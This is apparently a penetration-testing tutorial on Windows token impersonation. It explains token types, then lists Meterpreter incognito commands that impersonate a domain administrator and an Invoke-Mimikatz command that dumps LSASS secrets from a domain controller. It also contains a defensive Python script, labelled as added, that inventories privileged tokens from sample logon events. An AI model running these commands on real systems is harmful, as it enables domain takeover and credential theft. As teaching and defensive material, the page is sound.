Token Impersonation

Windows access tokens are temporary credentials that let a user perform actions on a system or network without re-entering a password, much like session cookies on a web site. A token is created when a user logs on to a system, whether at the console or over an RDP session, and it stays in memory until the system is rebooted.

Types of Tokens

  • Delegate: created by interactive logons, such as logging on at the machine or over RDP
  • Impersonate: created by non-interactive authentication, such as mapping a network drive

Finding Tokens

Ideally, you want to find the tokens of a domain administrator in order to expose additional attack vectors against the domain controller.

To move laterally across computers in the domain, you could pass the hashes or passwords of users who hold privileges on multiple systems, or compromise additional vulnerable services.
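From the defender's side, the same facts (interactive and RDP logons leave delegate tokens, network logons do not, and tokens survive until reboot) give a simple way to inventory which hosts currently hold a privileged account's delegate token. The script below is an added example, not part of the original page; it walks constructed Security-log records (hypothetical hosts and accounts) and assumes Event ID 4624 for logons with logon types 2, 10 and 11 as the delegate-creating types, and Event ID 4608 ("Windows is starting up") as the reboot marker that clears a host.

```python
"""Inventory hosts where privileged accounts have left delegate-level tokens.

Interactive (2), RemoteInteractive/RDP (10) and CachedInteractive (11) logons
leave a delegate-level token on the host until it reboots; a network logon (3)
leaves only an impersonate-level token.  The records below are constructed
samples standing in for parsed Security-log events.
"""
from collections import defaultdict

# Logon types that create a delegate-level (interactive) token on the host.
DELEGATE_LOGON_TYPES = {2, 10, 11}

# Constructed sample events (hypothetical hosts and accounts), time-ordered.
SAMPLE_EVENTS = [
    {"time": 1, "event_id": 4624, "host": "WS01", "user": "alice",    "logon_type": 10},
    {"time": 2, "event_id": 4624, "host": "WS01", "user": "da_admin", "logon_type": 10},  # RDP by a DA
    {"time": 3, "event_id": 4624, "host": "WS02", "user": "da_admin", "logon_type": 3},   # network logon only
    {"time": 4, "event_id": 4624, "host": "WS03", "user": "da_admin", "logon_type": 2},   # console logon
    {"time": 5, "event_id": 4608, "host": "WS03"},                                        # WS03 rebooted
    {"time": 6, "event_id": 4624, "host": "WS03", "user": "bob",      "logon_type": 2},
]


def delegate_token_exposures(events, privileged_users):
    """Return {host: set of privileged users} whose delegate tokens are still resident.

    A delegate-creating logon adds the account to the host's set; a startup
    event (4608) clears that host, because tokens do not survive a reboot.
    Logoff events are deliberately ignored: the token outlives the session.
    """
    wanted = {u.lower() for u in privileged_users}
    resident = defaultdict(set)
    for ev in sorted(events, key=lambda e: e["time"]):
        host = ev["host"]
        if ev["event_id"] == 4608:
            resident.pop(host, None)
        elif ev["event_id"] == 4624 and ev["logon_type"] in DELEGATE_LOGON_TYPES:
            if ev["user"].lower() in wanted:
                resident[host].add(ev["user"])
    return {h: users for h, users in resident.items() if users}


if __name__ == "__main__":
    for host, users in delegate_token_exposures(SAMPLE_EVENTS, {"da_admin"}).items():
        print(f"{host}: privileged delegate tokens resident for {sorted(users)}")
```

On the sample data only WS01 is reported: WS02 saw a network logon, which leaves no delegate token, and WS03's token was cleared by the reboot.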

Dumping Tokens with Metasploit

meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token domain\\administrator

Now that we are running in the context of a domain administrator, we could use a tool like Invoke-Mimikatz to dump LSASS on the domain controller.

PS C:\> hostname
PS C:\> Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /inject" exit' -Computer

Revert Msfconsole Shell

This reverts the meterpreter session to its original security context:

meterpreter > revself